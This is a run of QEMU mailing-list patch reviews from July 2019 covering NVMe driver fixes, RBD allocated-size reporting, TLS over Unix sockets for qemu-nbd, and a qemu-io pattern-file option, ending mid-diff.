> This changes how an nvme device is created. Example with two namespaces:
> 
>   -drive file=nvme0n1.img,if=none,id=disk1
>   -drive file=nvme0n2.img,if=none,id=disk2
>   -device nvme,serial=deadbeef,id=nvme0
>   -device nvme-ns,drive=disk1,bus=nvme0,nsid=1
>   -device nvme-ns,drive=disk2,bus=nvme0,nsid=2
> 
> A maximum of 256 namespaces can be configured.
> 
 
Well, that was embarrassing.

This patch breaks nvme-test.c. Which I obviously did not run.

In my defense, the test doesn't do much currently, but I'll of course
fix the test for v2.



Re: [Qemu-block] [PATCH v3 5/6] block/nvme: add support for write zeros

2019-07-05 Thread Max Reitz
On 03.07.19 17:59, Maxim Levitsky wrote:
> Signed-off-by: Maxim Levitsky 
> ---
>  block/nvme.c | 69 +++-
>  block/trace-events   |  1 +
>  include/block/nvme.h | 19 +++-
>  3 files changed, 87 insertions(+), 2 deletions(-)
> 
> diff --git a/block/nvme.c b/block/nvme.c
> index 152d27b07f..02e0846643 100644
> --- a/block/nvme.c
> +++ b/block/nvme.c

[...]

> @@ -469,6 +473,11 @@ static void nvme_identify(BlockDriverState *bs, int 
> namespace, Error **errp)
>  s->nsze = le64_to_cpu(idns->nsze);
>  lbaf = &idns->lbaf[NVME_ID_NS_FLBAS_INDEX(idns->flbas)];
>  
> +if (NVME_ID_NS_DLFEAT_WRITE_ZEROS(idns->dlfeat) &&
> +NVME_ID_NS_DLFEAT_READ_BEHAVIOR(idns->dlfeat) ==
> +NVME_ID_NS_DLFEAT_READ_BEHAVIOR_ZEROS)
> +bs->supported_write_flags |= BDRV_REQ_MAY_UNMAP;
> +

This violates the coding style, there should be curly brackets here.

>  if (lbaf->ms) {
>  error_setg(errp, "Namespaces with metadata are not yet supported");
>  goto out;
> @@ -763,6 +772,8 @@ static int nvme_file_open(BlockDriverState *bs, QDict 
> *options, int flags,
>  int ret;
>  BDRVNVMeState *s = bs->opaque;
>  
> +bs->supported_write_flags = BDRV_REQ_FUA;
> +
>  opts = qemu_opts_create(&runtime_opts, NULL, 0, &error_abort);
>  qemu_opts_absorb_qdict(opts, options, &error_abort);
>  device = qemu_opt_get(opts, NVME_BLOCK_OPT_DEVICE);
> @@ -791,7 +802,6 @@ static int nvme_file_open(BlockDriverState *bs, QDict 
> *options, int flags,
>  goto fail;
>  }
>  }
> -bs->supported_write_flags = BDRV_REQ_FUA;

Any reason for this movement?

>  return 0;
>  fail:
>  nvme_close(bs);
> @@ -1085,6 +1095,60 @@ static coroutine_fn int nvme_co_flush(BlockDriverState 
> *bs)
>  }
>  
>  
> +static coroutine_fn int nvme_co_pwrite_zeroes(BlockDriverState *bs,
> +  int64_t offset,
> +  int bytes,
> +  BdrvRequestFlags flags)
> +{
> +BDRVNVMeState *s = bs->opaque;
> +NVMeQueuePair *ioq = s->queues[1];
> +NVMeRequest *req;
> +
> +if (!s->supports_write_zeros) {
> +return -ENOTSUP;
> +}
> +
> +uint32_t cdw12 = ((bytes >> s->blkshift) - 1) & 0xFFFF;

Another coding style violation: Variable declarations and other code may
not be mixed.

> +
> +NvmeCmd cmd = {
> +.opcode = NVME_CMD_WRITE_ZEROS,
> +.nsid = cpu_to_le32(s->nsid),
> +.cdw10 = cpu_to_le32((offset >> s->blkshift) & 0xFFFFFFFF),
> +.cdw11 = cpu_to_le32(((offset >> s->blkshift) >> 32) & 0xFFFFFFFF),
> +};
> +
> +NVMeCoData data = {
> +.ctx = bdrv_get_aio_context(bs),
> +.ret = -EINPROGRESS,
> +};

[...]

> diff --git a/include/block/nvme.h b/include/block/nvme.h
> index 3ec8efcc43..65eb65c740 100644
> --- a/include/block/nvme.h
> +++ b/include/block/nvme.h
> @@ -653,12 +653,29 @@ typedef struct NvmeIdNs {
>  uint8_t mc;
>  uint8_t dpc;
>  uint8_t dps;
> -uint8_t res30[98];
> +
> +uint8_t nmic;
> +uint8_t rescap;
> +uint8_t fpi;
> +uint8_t dlfeat;
> +
> +uint8_t res30[94];
>  NvmeLBAFlbaf[16];
>  uint8_t res192[192];
>  uint8_t vs[3712];
>  } NvmeIdNs;
>  
> +
> +/*Deallocate Logical Block Features*/
> +#define NVME_ID_NS_DLFEAT_GUARD_CRC(dlfeat)   ((dlfeat) & 0x10)
> +#define NVME_ID_NS_DLFEAT_WRITE_ZEROS(dlfeat) ((dlfeat) & 0x04)

Isn’t it bit 3, i.e. 0x08?

Max

> +
> +#define NVME_ID_NS_DLFEAT_READ_BEHAVIOR(dlfeat) ((dlfeat) & 0x3)
> +#define NVME_ID_NS_DLFEAT_READ_BEHAVIOR_UNDEFINED   0
> +#define NVME_ID_NS_DLFEAT_READ_BEHAVIOR_ZEROS   1
> +#define NVME_ID_NS_DLFEAT_READ_BEHAVIOR_ONES2
> +
> +
>  #define NVME_ID_NS_NSFEAT_THIN(nsfeat)  ((nsfeat & 0x1))
>  #define NVME_ID_NS_FLBAS_EXTENDED(flbas)((flbas >> 4) & 0x1)
>  #define NVME_ID_NS_FLBAS_INDEX(flbas)   ((flbas & 0xf))
> 






Re: [Qemu-block] [PATCH v3 4/6] block/nvme: add support for image creation

2019-07-05 Thread Max Reitz
On 03.07.19 17:59, Maxim Levitsky wrote:
Tested on an NVMe device like this:
> 
> # create preallocated qcow2 image
> $ qemu-img create -f qcow2 nvme://:06:00.0/1 10G -o preallocation=metadata
> Formatting 'nvme://:06:00.0/1', fmt=qcow2 size=10737418240 
> cluster_size=65536 preallocation=metadata lazy_refcounts=off refcount_bits=16
> 
> # create an empty qcow2 image
> $ qemu-img create -f qcow2 nvme://:06:00.0/1 10G -o preallocation=off
> Formatting 'nvme://:06:00.0/1', fmt=qcow2 size=10737418240 
> cluster_size=65536 preallocation=off lazy_refcounts=off refcount_bits=16
> 
> Signed-off-by: Maxim Levitsky 
> ---
>  block/nvme.c | 108 +++
>  1 file changed, 108 insertions(+)

Hm.  I’m not quite sure I like this, because this is not image creation.

What we need is a general interface for formatting existing files.  I
mean, we have that in QMP (blockdev-create), but the problem is that
this doesn’t really translate to qemu-img create.

I wonder whether it’s best to hack something up that makes
bdrv_create_file() a no-op, or whether we should expose blockdev-create
over qemu-img.  I’ll see how difficult the latter is, it sounds fun
(famous last words).

Max





Re: [Qemu-block] [PATCH v3 3/6] block/nvme: support larger that 512 bytes sector devices

2019-07-05 Thread Max Reitz
On 03.07.19 17:59, Maxim Levitsky wrote:
> Currently the driver hardcodes the sector size to 512,
> and doesn't check the underlying device. Fix that.
> 
> Also fail if the underlying nvme device is formatted with metadata
> as this needs special support.
> 
> Signed-off-by: Maxim Levitsky 
> ---
>  block/nvme.c | 45 -
>  1 file changed, 40 insertions(+), 5 deletions(-)
> 
> diff --git a/block/nvme.c b/block/nvme.c
> index 52798081b2..1f0d09349f 100644
> --- a/block/nvme.c
> +++ b/block/nvme.c

[...]

> @@ -463,7 +467,22 @@ static void nvme_identify(BlockDriverState *bs, int 
> namespace, Error **errp)
>  }
>  
>  s->nsze = le64_to_cpu(idns->nsze);
> +lbaf = &idns->lbaf[NVME_ID_NS_FLBAS_INDEX(idns->flbas)];
> +
> +if (lbaf->ms) {
> +error_setg(errp, "Namespaces with metadata are not yet supported");
> +goto out;
> +}
> +
> +hwsect_size = 1 << lbaf->ds;
> +
> +if (hwsect_size < BDRV_SECTOR_BITS || hwsect_size > s->page_size) {

s/BDRV_SECTOR_BITS/BDRV_SECTOR_SIZE/

> +error_setg(errp, "Namespace has unsupported block size (%d)",
> +hwsect_size);
> +goto out;
> +}
>  
> +s->blkshift = lbaf->ds;
>  out:
>  qemu_vfio_dma_unmap(s->vfio, resp);
>  qemu_vfree(resp);
> @@ -782,8 +801,22 @@ fail:
>  static int64_t nvme_getlength(BlockDriverState *bs)
>  {
>  BDRVNVMeState *s = bs->opaque;
> +return s->nsze << s->blkshift;
> +}
>  
> -return s->nsze << BDRV_SECTOR_BITS;
> +static int64_t nvme_get_blocksize(BlockDriverState *bs)
> +{
> +BDRVNVMeState *s = bs->opaque;
> +assert(s->blkshift >= 9);

I think BDRV_SECTOR_BITS is more correct here (this is about what the
general block layer code expects).  Also, there’s no pain in doing so,
as you did check against BDRV_SECTOR_SIZE in nvme_identify().

Max

> +return 1 << s->blkshift;
> +}
> +
> +static int nvme_probe_blocksizes(BlockDriverState *bs, BlockSizes *bsz)
> +{
> +int64_t blocksize = nvme_get_blocksize(bs);
> +bsz->phys = blocksize;
> +bsz->log = blocksize;
> +return 0;
>  }
>  
>  /* Called with s->dma_map_lock */





Re: [Qemu-block] [PATCH v3 2/6] block/nvme: fix doorbell stride

2019-07-05 Thread Max Reitz
On 05.07.19 13:09, Max Reitz wrote:
> On 03.07.19 17:59, Maxim Levitsky wrote:
>> Fix the math involving non standard doorbell stride
>>
>> Signed-off-by: Maxim Levitsky 
>> ---
>>  block/nvme.c | 2 +-
>>  1 file changed, 1 insertion(+), 1 deletion(-)
>>
>> diff --git a/block/nvme.c b/block/nvme.c
>> index 6d4e7f3d83..52798081b2 100644
>> --- a/block/nvme.c
>> +++ b/block/nvme.c
>> @@ -217,7 +217,7 @@ static NVMeQueuePair 
>> *nvme_create_queue_pair(BlockDriverState *bs,
>>  error_propagate(errp, local_err);
>>  goto fail;
>>  }
>> -q->cq.doorbell = &s->regs->doorbells[idx * 2 * s->doorbell_scale + 1];
>> +q->cq.doorbell = &s->regs->doorbells[(idx * 2 + 1) * s->doorbell_scale];
>>  
>>  return q;
>>  fail:
> 
> Hm.  How has this ever worked?

(Ah, because CAP.DSTRD has probably been 0 in most devices.)
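
For the record, a tiny standalone check of the two index formulas
(a sketch; 'scale' stands for s->doorbell_scale, i.e. the stride in
uint32_t units, 1 << CAP.DSTRD):

#include <assert.h>
#include <stdio.h>

int main(void)
{
    for (unsigned dstrd = 0; dstrd < 4; dstrd++) {
        unsigned scale = 1u << dstrd;               /* s->doorbell_scale */
        for (unsigned idx = 0; idx < 4; idx++) {
            unsigned old = idx * 2 * scale + 1;     /* pre-patch index */
            unsigned new = (idx * 2 + 1) * scale;   /* patched index   */
            /* spec: CQ doorbell byte offset = 0x1000 + (2*idx+1)*(4 << DSTRD),
             * which in uint32_t units is exactly the patched formula */
            assert(new == (2 * idx + 1) * ((4u << dstrd) / 4));
            if (old != new) {
                printf("DSTRD=%u qid=%u: old index %u, correct index %u\n",
                       dstrd, idx, old, new);
            }
        }
    }
    return 0;
}

The two agree only when DSTRD is 0, which is why nobody noticed.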





Re: [Qemu-block] [PATCH v3 2/6] block/nvme: fix doorbell stride

2019-07-05 Thread Max Reitz
On 03.07.19 17:59, Maxim Levitsky wrote:
> Fix the math involving non standard doorbell stride
> 
> Signed-off-by: Maxim Levitsky 
> ---
>  block/nvme.c | 2 +-
>  1 file changed, 1 insertion(+), 1 deletion(-)
> 
> diff --git a/block/nvme.c b/block/nvme.c
> index 6d4e7f3d83..52798081b2 100644
> --- a/block/nvme.c
> +++ b/block/nvme.c
> @@ -217,7 +217,7 @@ static NVMeQueuePair 
> *nvme_create_queue_pair(BlockDriverState *bs,
>  error_propagate(errp, local_err);
>  goto fail;
>  }
> -q->cq.doorbell = &s->regs->doorbells[idx * 2 * s->doorbell_scale + 1];
> +q->cq.doorbell = &s->regs->doorbells[(idx * 2 + 1) * s->doorbell_scale];
>  
>  return q;
>  fail:

Hm.  How has this ever worked?

Reviewed-by: Max Reitz 





Re: [Qemu-block] [PATCH v3 1/6] block/nvme: don't touch the completion entries

2019-07-05 Thread Max Reitz
On 03.07.19 17:59, Maxim Levitsky wrote:
> Completion entries are meant to be only read by the host and written by the 
> device.
> The driver is supposed to scan the completions from the last point where it
> left off, until it sees a completion whose phase bit has not been flipped.

(Disclaimer: This is the first time I read the nvme driver, or really
something in the nvme spec.)

Well, no, completion entries are also meant to be initialized by the
host.  To me it looks like this is the place where that happens:
Everything that has been processed by the device is immediately being
re-initialized.

Maybe we shouldn’t do that here but in nvme_submit_command().  But
currently we don’t, and I don’t see any other place where we currently
initialize the CQ entries.
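
For anyone following along, the phase-bit convention under discussion,
reduced to a standalone toy (not the driver code, just the protocol shape):

#include <stdbool.h>
#include <stdint.h>
#include <stdio.h>

#define QUEUE_SIZE 4

struct cqe { uint16_t status; };      /* bit 0 = phase tag */

int main(void)
{
    struct cqe cq[QUEUE_SIZE] = {0};  /* host zeroes the queue: phase 0 */
    unsigned head = 0;
    int phase = 1;                    /* host expects phase 1 after reset */

    /* The device "posts" two completions with the current phase. */
    cq[0].status = 1;
    cq[1].status = 1;

    /* The host consumes entries until the phase bit stops matching. */
    while ((cq[head].status & 0x1) == phase) {
        printf("completion at slot %u\n", head);
        head = (head + 1) % QUEUE_SIZE;
        if (head == 0) {
            phase = !phase;           /* flip expectation on wrap-around */
        }
    }
    return 0;
}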

Max

> Signed-off-by: Maxim Levitsky 
> ---
>  block/nvme.c | 5 +
>  1 file changed, 1 insertion(+), 4 deletions(-)
> 
> diff --git a/block/nvme.c b/block/nvme.c
> index 73ed5fa75f..6d4e7f3d83 100644
> --- a/block/nvme.c
> +++ b/block/nvme.c
> @@ -315,7 +315,7 @@ static bool nvme_process_completion(BDRVNVMeState *s, 
> NVMeQueuePair *q)
>  while (q->inflight) {
>  int16_t cid;
>  c = (NvmeCqe *)&q->cq.queue[q->cq.head * NVME_CQ_ENTRY_BYTES];
> -if (!c->cid || (le16_to_cpu(c->status) & 0x1) == q->cq_phase) {
> +if ((le16_to_cpu(c->status) & 0x1) == q->cq_phase) {
>  break;
>  }
>  q->cq.head = (q->cq.head + 1) % NVME_QUEUE_SIZE;
> @@ -339,10 +339,7 @@ static bool nvme_process_completion(BDRVNVMeState *s, 
> NVMeQueuePair *q)
>  qemu_mutex_unlock(&q->lock);
>  req.cb(req.opaque, nvme_translate_error(c));
>  qemu_mutex_lock(&q->lock);
> -c->cid = cpu_to_le16(0);
>  q->inflight--;
> -/* Flip Phase Tag bit. */
> -c->status = cpu_to_le16(le16_to_cpu(c->status) ^ 0x1);
>  progress = true;
>  }
>  if (progress) {
> 






Re: [Qemu-block] [PATCH v3] block/rbd: implement .bdrv_get_allocated_file_size callback

2019-07-05 Thread Stefano Garzarella
On Fri, Jul 05, 2019 at 11:58:43AM +0200, Max Reitz wrote:
> On 05.07.19 11:32, Stefano Garzarella wrote:
> > This patch allows 'qemu-img info' to show the 'disk size' for
> > the RBD images that have the fast-diff feature enabled.
> > 
> > If this feature is enabled, we use the rbd_diff_iterate2() API
> > to calculate the allocated size for the image.
> > 
> > Signed-off-by: Stefano Garzarella 
> > ---
> > v3:
> >   - return -ENOTSUP instead of -1 when fast-diff is not available
> > [John, Jason]
> > v2:
> >   - calculate the actual usage only if the fast-diff feature is
> > enabled [Jason]
> > ---
> >  block/rbd.c | 54 +
> >  1 file changed, 54 insertions(+)
> 
> Well, the librbd documentation is non-existing as always, but while
> googling, I at least found that libvirt has exactly the same code.  So I
> suppose it must be quite correct, then.
> 

While I wrote this code I took a look at libvirt implementation and also
at the "rbd" tool in the ceph repository: compute_image_disk_usage() in
src/tools/rbd/action/DiskUsage.cc

> > diff --git a/block/rbd.c b/block/rbd.c
> > index 59757b3120..b6bed683e5 100644
> > --- a/block/rbd.c
> > +++ b/block/rbd.c
> > @@ -1084,6 +1084,59 @@ static int64_t qemu_rbd_getlength(BlockDriverState 
> > *bs)
> >  return info.size;
> >  }
> >  
> > +static int rbd_allocated_size_cb(uint64_t offset, size_t len, int exists,
> > + void *arg)
> > +{
> > +int64_t *alloc_size = (int64_t *) arg;
> > +
> > +if (exists) {
> > +(*alloc_size) += len;
> > +}
> > +
> > +return 0;
> > +}
> > +
> > +static int64_t qemu_rbd_get_allocated_file_size(BlockDriverState *bs)
> > +{
> > +BDRVRBDState *s = bs->opaque;
> > +uint64_t flags, features;
> > +int64_t alloc_size = 0;
> > +int r;
> > +
> > +r = rbd_get_flags(s->image, &flags);
> > +if (r < 0) {
> > +return r;
> > +}
> > +
> > +r = rbd_get_features(s->image, &features);
> > +if (r < 0) {
> > +return r;
> > +}
> > +
> > +/*
> > + * We use rbd_diff_iterate2() only if the RBD image have fast-diff
> > + * feature enabled. If it is disabled, rbd_diff_iterate2() could be
> > + * very slow on a big image.
> > + */
> > +if (!(features & RBD_FEATURE_FAST_DIFF) ||
> > +(flags & RBD_FLAG_FAST_DIFF_INVALID)) {
> > +return -ENOTSUP;
> > +}
> > +
> > +/*
> > + * rbd_diff_iterate2(), if the source snapshot name is NULL, invokes
> > + * the callback on all allocated regions of the image.
> > + */
> > +r = rbd_diff_iterate2(s->image, NULL, 0,
> > +  bs->total_sectors * BDRV_SECTOR_SIZE, 0, 1,
> > +  &rbd_allocated_size_cb, &alloc_size);
> 
> But I have a question.  This is basically block_status, right?  So it
> gives us information on which areas are allocated and which are not.
> The result thus gives us a lower bound on the allocation size, but is it
> really exactly the allocation size?
> 
> There are two things I’m concerned about:
> 
> 1. What about metadata?

Good question, I don't think it includes the size used by metadata and I
don't know if there is a way to know it. I'll check better.

> 
> 2. If you have multiple snapshots, this will only report the overall
> allocation information, right?  So say there is something like this:
> 
> (“A” means an allocated MB, “-” is an unallocated MB)
> 
> Snapshot 1: AAAAA--
> Snapshot 2: --AAAA-
> Snapshot 3: ---AAAA
> 
> I think the allocated data size is the number of As in total (13 MB).
> But I suppose this API will just return 7 MB, because it looks on
> everything an it sees the whole image range (7 MB) to be allocated.  It
> doesn’t report in how many snapshots some region is allocated.

Looking at the documentation of rbd_diff_iterate2() [1], it says:

 *If the source snapshot name is NULL, we
 * interpret that as the beginning of time and return all allocated
 * regions of the image.

But I don't know the answer to your question (maybe Jason can help
here).
I should look more closely at the implementation to see whether I can
iterate over all snapshots to get the exact allocated data size.

[1] https://github.com/ceph/ceph/blob/master/src/include/rbd/librbd.h#L925

I'll be back when I have more details on the rbd implementation to better
answer your questions.
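
If iterating over snapshots does work, what I have in mind is roughly the
following (completely untested sketch; assumes rbd_snap_list()/rbd_snap_set()
behave as documented in librbd.h, snapshots come back in creation order, and
error handling is trimmed for brevity):

static int64_t rbd_exact_allocated_size(rbd_image_t image, uint64_t size)
{
    rbd_snap_info_t snaps[32];
    int max_snaps = 32;
    int nr = rbd_snap_list(image, snaps, &max_snaps);
    const char *from = NULL;            /* "beginning of time" */
    int64_t total = 0;
    int i, r;

    if (nr < 0) {
        return nr;
    }
    for (i = 0; i <= nr; i++) {
        /* diff snapshot i (or the head, when i == nr) against 'from' */
        const char *to = (i < nr) ? snaps[i].name : NULL;
        int64_t alloc = 0;

        rbd_snap_set(image, to);        /* NULL selects the image head */
        r = rbd_diff_iterate2(image, from, 0, size, 0, 1,
                              rbd_allocated_size_cb, &alloc);
        if (r < 0) {
            total = r;
            break;
        }
        total += alloc;
        from = to;
    }
    rbd_snap_set(image, NULL);          /* restore the head view */
    rbd_snap_list_end(snaps);
    return total;
}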

Thanks,
Stefano



Re: [Qemu-block] [Qemu-devel] [PATCH v2 RFC] qemu-nbd: Permit TLS with Unix sockets

2019-07-05 Thread Daniel P . Berrangé
On Wed, Jul 03, 2019 at 05:47:07PM -0500, Eric Blake wrote:

> +== check TLS works over Unix ==
> +image: nbd+unix://?socket=SOCKET
> +file format: nbd
> +virtual size: 64 MiB (67108864 bytes)
> +disk size: unavailable
> +image: nbd+unix://?socket=SOCKET
> +file format: nbd
> +virtual size: 64 MiB (67108864 bytes)
> +disk size: unavailable
> +qemu-nbd: Certificate does not match the hostname 0.0.0.0

Seeing 0.0.0.0 is very odd since we don't specify that on the CLI anywhere.

It looks like this is a side effect of reusing the "bindto" variable in
--list mode, getting the default bind address of 0.0.0.0.  We should
ensure that this variable defaults to NULL when in --list mode I think,
which will probably highlight the tlssession.c bug I mentioned.


Regards,
Daniel
-- 
|: https://berrange.com  -o-https://www.flickr.com/photos/dberrange :|
|: https://libvirt.org -o-https://fstop138.berrange.com :|
|: https://entangle-photo.org-o-https://www.instagram.com/dberrange :|



Re: [Qemu-block] [Qemu-devel] [PATCH v2 RFC] qemu-nbd: Permit TLS with Unix sockets

2019-07-05 Thread Daniel P . Berrangé
On Fri, Jul 05, 2019 at 11:31:51AM +0200, Max Reitz wrote:
> On 04.07.19 00:47, Eric Blake wrote:



> > diff --git a/tests/qemu-iotests/233.out b/tests/qemu-iotests/233.out
> > index 9b46284ab0de..b86bee020649 100644
> > --- a/tests/qemu-iotests/233.out
> > +++ b/tests/qemu-iotests/233.out
> 
> [...]
> 
> > +== check TLS works over Unix ==
> > +image: nbd+unix://?socket=SOCKET
> > +file format: nbd
> > +virtual size: 64 MiB (67108864 bytes)
> > +disk size: unavailable
> 
> This has worked surprisingly well considering you did not pass tls-hostname.
> 
> On the same note: If I remove the tls-hostname option from the “perform
> I/O over TLS” test, it keeps working.

Yeah, that's a bug in crypto/tlssession.c.

It is assuming that the hostname will always be provided for sessions
in client mode, which was valid previously as all sessions were TCP
based, i.e. it assumed that if the hostname was NULL, it was doing
server-side certificate validation.

That assumption is bogus now we allow sessions on non-TCP, so we must
fix the code thus:


@@ -365,6 +367,14 @@ qcrypto_tls_session_check_certificate(QCryptoTLSSession 
*session,
 goto error;
 }
 }
+if (!session->hostname &&
+session->creds->endpoint ==
+QCRYPTO_TLS_CREDS_ENDPOINT_CLIENT) {
+error_setg(errp,
+   "No hostname available to validate against "
+   "server's x509 certificate");
+goto error;
+}
 if (session->hostname) {
 if (!gnutls_x509_crt_check_hostname(cert, session->hostname)) {
 error_setg(errp,



Regards,
Daniel
-- 
|: https://berrange.com  -o-https://www.flickr.com/photos/dberrange :|
|: https://libvirt.org -o-https://fstop138.berrange.com :|
|: https://entangle-photo.org-o-https://www.instagram.com/dberrange :|



Re: [Qemu-block] [Qemu-devel] [PATCH v2 RFC] qemu-nbd: Permit TLS with Unix sockets

2019-07-05 Thread Daniel P . Berrangé
On Wed, Jul 03, 2019 at 05:47:07PM -0500, Eric Blake wrote:
> Although you generally won't use encryption with a Unix socket (after
> all, everything is local, so why waste the CPU power), there are
> situations in testsuites where Unix sockets are much nicer than TCP
> sockets.  Since nbdkit allows encryption over both types of sockets,
> it makes sense for qemu-nbd to do likewise.
> 
> The restriction has been present since its introduction in commits
> 145614a1 and 75822a12 (v2.6), where the former documented the
> limitation but did not provide any additional explanation why it was
> added; but looking closer, it seems the most likely reason is that
> x509 verification requires a hostname. But we can do the same as
> migration did, and add a tls-hostname parameter to supply that
> information.

Yes, the x509 cert validation is precisely the reason.

The client must validate the hostname it is connecting to, against
the x509 certificate received from the server. If it doesn't use
IP, then it has no hostname to validate the cert against.

Since that time though, we added support for PSK credentials with
TLS which requires no hostname validation, so the restriction no
longer makes sense.

Adding ability to set a tls-hostname parameter further enables its
use with x509 credentials.

> RFC: The test is racy - it sometimes passes, and sometimes fails with:
> 
>  == check TLS with authorization over Unix ==
>  qemu-img: Could not open 
> 'driver=nbd,path=SOCKET,tls-creds=tls0,tls-hostname=localhost': Failed to 
> read option reply: Cannot read from TLS channel: Input/output error
> -qemu-img: Could not open 
> 'driver=nbd,path=SOCKET,tls-creds=tls0,tls-hostname=localhost': Failed to 
> read option reply: Cannot read from TLS channel: Input/output error
> +qemu-img: Could not open 
> 'driver=nbd,path=SOCKET,tls-creds=tls0,tls-hostname=localhost': Failed to 
> read option reply: Cannot read from TLS channel: Software caused connection 
> abort

It is a bit complex to debug this because unfortunately gnutls API
doesn't allow us to propagate the root cause error accurately.

We return ECONNABORTED when GNUTLS reports GNUTLS_E_PREMATURE_TERMINATION.
It reports this when it tries to read a packet header and gets EOF from
the socket.

We return EIO in other cases where there's no GNUTLS error code we
want to handle explicitly. With some debugging I find that GNUTLS
is returning GNUTLS_E_PULL_ERROR, which is a generic code it returns
whenever the read() callback fails for a reason which isn't EAGAIN.

With more debugging I find the original recvfrom() is returning
ECONNRESET, so this is basically just another name for EOF.
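
So in practice the mapping is: GNUTLS_E_PREMATURE_TERMINATION (a clean EOF
mid-TLS) becomes ECONNABORTED, while GNUTLS_E_PULL_ERROR (the read()
callback failing, e.g. with ECONNRESET underneath) falls into the default
case and becomes EIO; which one the client reports just depends on how far
the handshake got before the server dropped the connection.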

I'm curious why we see EOF sometimes and ECONNRESET at other times.
I disabled the qio_channel_shutdown call on the server and that just
changed to a different race. Now we sometimes get ECONNRESET, and
sometimes get EIO when trying to send the first NBD option header
instead.

> I suspect that there is a bug in the qio TLS channel code when it
> comes to handling a failed TLS handshake, which results in the racy
> output. I'll need help solving that first.  It might also be nice if
> we had a bit more visibility into the gnutls error message when TLS
> handshake fails.

I'm not sure there is a bug - it feels like there are just a few different
shutdown scenarios we can hit based on timing, due to the fact there is
no synchronization with the client when we drop the connection if
authz fails.


> @@ -1624,12 +1629,25 @@ static int nbd_open(BlockDriverState *bs, QDict 
> *options, int flags,
>  goto error;
>  }
> 
> -/* TODO SOCKET_ADDRESS_KIND_FD where fd has AF_INET or AF_INET6 */
> -if (s->saddr->type != SOCKET_ADDRESS_TYPE_INET) {
> -error_setg(errp, "TLS only supported over IP sockets");
> +switch (s->saddr->type) {
> +case SOCKET_ADDRESS_TYPE_INET:
> +hostname = s->saddr->u.inet.host;
> +if (qemu_opt_get(opts, "tls-hostname")) {
> +error_setg(errp, "tls-hostname not required with inet 
> socket");
> +goto error;
> +}

We don't need to forbid this. Consider if you have set up an SSH tunnel
from localhost:someport, over to your remote server. NBD will get told
to connect to localhost, but will need to validate the cert against
the real remote hostname.

> +break;
> +case SOCKET_ADDRESS_TYPE_UNIX:
> +hostname = qemu_opt_get(opts, "tls-hostname");
> +break;
> +default:
> +/* TODO SOCKET_ADDRESS_KIND_FD where fd has AF_INET or AF_INET6 
> */
> +error_setg(errp, "TLS only supported over IP or Unix sockets");
>  goto error;
>  }

I don't think we need any of this switch; instead, just something like this:

   hostname = qemu_opt_get(opts, "tls-hostname");
   if (!hostname) {
   if (s->saddr->type == SOCKET_ADDRESS_TYPE_INET) {
   hostname = s->saddr->u.inet.host;

[Qemu-block] [PATCH v7] qemu-io: add pattern file for write command

2019-07-05 Thread Denis Plotnikov
The patch allows a pattern file to be provided for the write
command. There was no similar ability before.
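
For example (illustrative only), "qemu-io -c 'write -s pattern.bin 0 1M'
test.img" fills the 1M write buffer by repeating the contents of
pattern.bin until the requested length is reached.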

Signed-off-by: Denis Plotnikov 
---
v7:
  * fix variable naming
  * make code more readable
  * extend help for write command

v6:
  * the pattern file is read once to reduce io

v5:
  * file name initiated with null to make compilers happy

v4:
  * missing signed-off clause added

v3:
  * missing file closing added
  * exclusive flags processing changed
  * buffer void* converted to char* to fix pointer arithmetics
  * file reading error processing added
---
 qemu-io-cmds.c | 86 ++
 1 file changed, 80 insertions(+), 6 deletions(-)

diff --git a/qemu-io-cmds.c b/qemu-io-cmds.c
index 09750a23ce..495170380a 100644
--- a/qemu-io-cmds.c
+++ b/qemu-io-cmds.c
@@ -343,6 +343,66 @@ static void *qemu_io_alloc(BlockBackend *blk, size_t len, 
int pattern)
 return buf;
 }
 
+static void *qemu_io_alloc_from_file(BlockBackend *blk, size_t len,
+ char *file_name)
+{
+char *buf, *buf_origin;
+FILE *f = fopen(file_name, "r");
+int pattern_len;
+
+if (!f) {
+printf("'%s': %s\n", file_name, strerror(errno));
+return NULL;
+}
+
+if (qemuio_misalign) {
+len += MISALIGN_OFFSET;
+}
+
+buf_origin = buf = blk_blockalign(blk, len);
+
+pattern_len = fread(buf, sizeof(char), len, f);
+
+if (ferror(f)) {
+printf("'%s': %s\n", file_name, strerror(errno));
+goto error;
+}
+
+if (pattern_len == 0) {
+printf("'%s' is empty\n", file_name);
+goto error;
+}
+
+fclose(f);
+
+if (len > pattern_len) {
+char *file_buf = g_malloc(sizeof(char) * pattern_len);
+memcpy(file_buf, buf, pattern_len);
+len -= pattern_len;
+buf += pattern_len;
+
+while (len > 0) {
+size_t len_to_copy = MIN(pattern_len, len);
+
+memcpy(buf, file_buf, len_to_copy);
+
+len -= len_to_copy;
+buf += len_to_copy;
+}
+qemu_vfree(file_buf);
+}
+
+if (qemuio_misalign) {
+buf_origin += MISALIGN_OFFSET;
+}
+
+return buf_origin;
+
+error:
+qemu_vfree(buf_origin);
+return NULL;
+}
+
 static void qemu_io_free(void *p)
 {
 if (qemuio_misalign) {
@@ -949,6 +1009,7 @@ static void write_help(void)
 " -n, -- with -z, don't allow slow fallback\n"
 " -p, -- ignored for backwards compatibility\n"
 " -P, -- use different pattern to fill file\n"
+" -s, -- use a pattern file to fill the write buffer\n"
 " -C, -- report statistics in a machine parsable format\n"
 " -q, -- quiet mode, do not show I/O statistics\n"
 " -u, -- with -z, allow unmapping\n"
@@ -965,7 +1026,7 @@ static const cmdinfo_t write_cmd = {
 .perm   = BLK_PERM_WRITE,
 .argmin = 2,
 .argmax = -1,
-.args   = "[-bcCfnquz] [-P pattern] off len",
+.args   = "[-bcCfnquz] [-P pattern | -s source_file] off len",
 .oneline= "writes a number of bytes at a specified offset",
 .help   = write_help,
 };
@@ -974,7 +1035,7 @@ static int write_f(BlockBackend *blk, int argc, char 
**argv)
 {
 struct timeval t1, t2;
 bool Cflag = false, qflag = false, bflag = false;
-bool Pflag = false, zflag = false, cflag = false;
+bool Pflag = false, zflag = false, cflag = false, sflag = false;
 int flags = 0;
 int c, cnt, ret;
 char *buf = NULL;
@@ -983,8 +1044,9 @@ static int write_f(BlockBackend *blk, int argc, char 
**argv)
 /* Some compilers get confused and warn if this is not initialized.  */
 int64_t total = 0;
 int pattern = 0xcd;
+char *file_name = NULL;
 
-while ((c = getopt(argc, argv, "bcCfnpP:quz")) != -1) {
+while ((c = getopt(argc, argv, "bcCfnpP:quzs:")) != -1) {
 switch (c) {
 case 'b':
 bflag = true;
@@ -1020,6 +1082,10 @@ static int write_f(BlockBackend *blk, int argc, char 
**argv)
 case 'z':
 zflag = true;
 break;
+case 's':
+sflag = true;
+file_name = g_strdup(optarg);
+break;
 default:
